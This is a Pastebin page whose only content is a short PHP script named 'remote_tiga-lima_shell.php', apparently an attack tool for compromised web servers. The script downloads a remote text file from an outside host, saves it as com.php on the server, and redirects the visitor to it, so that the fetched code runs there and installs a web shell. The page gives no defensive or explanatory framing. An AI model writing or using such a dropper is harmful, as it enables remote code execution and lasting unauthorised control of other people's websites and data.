Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- remote_tiga-lima_shell.php
- <?php
- $namafile="com.php";
- $file = fopen($namafile ,'w+');
- $fa=file_get_contents('http://www.aliggroup.com/upload/log.txt');
- $write = fwrite ($file ,$fa);
- header ("location:com.php");
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement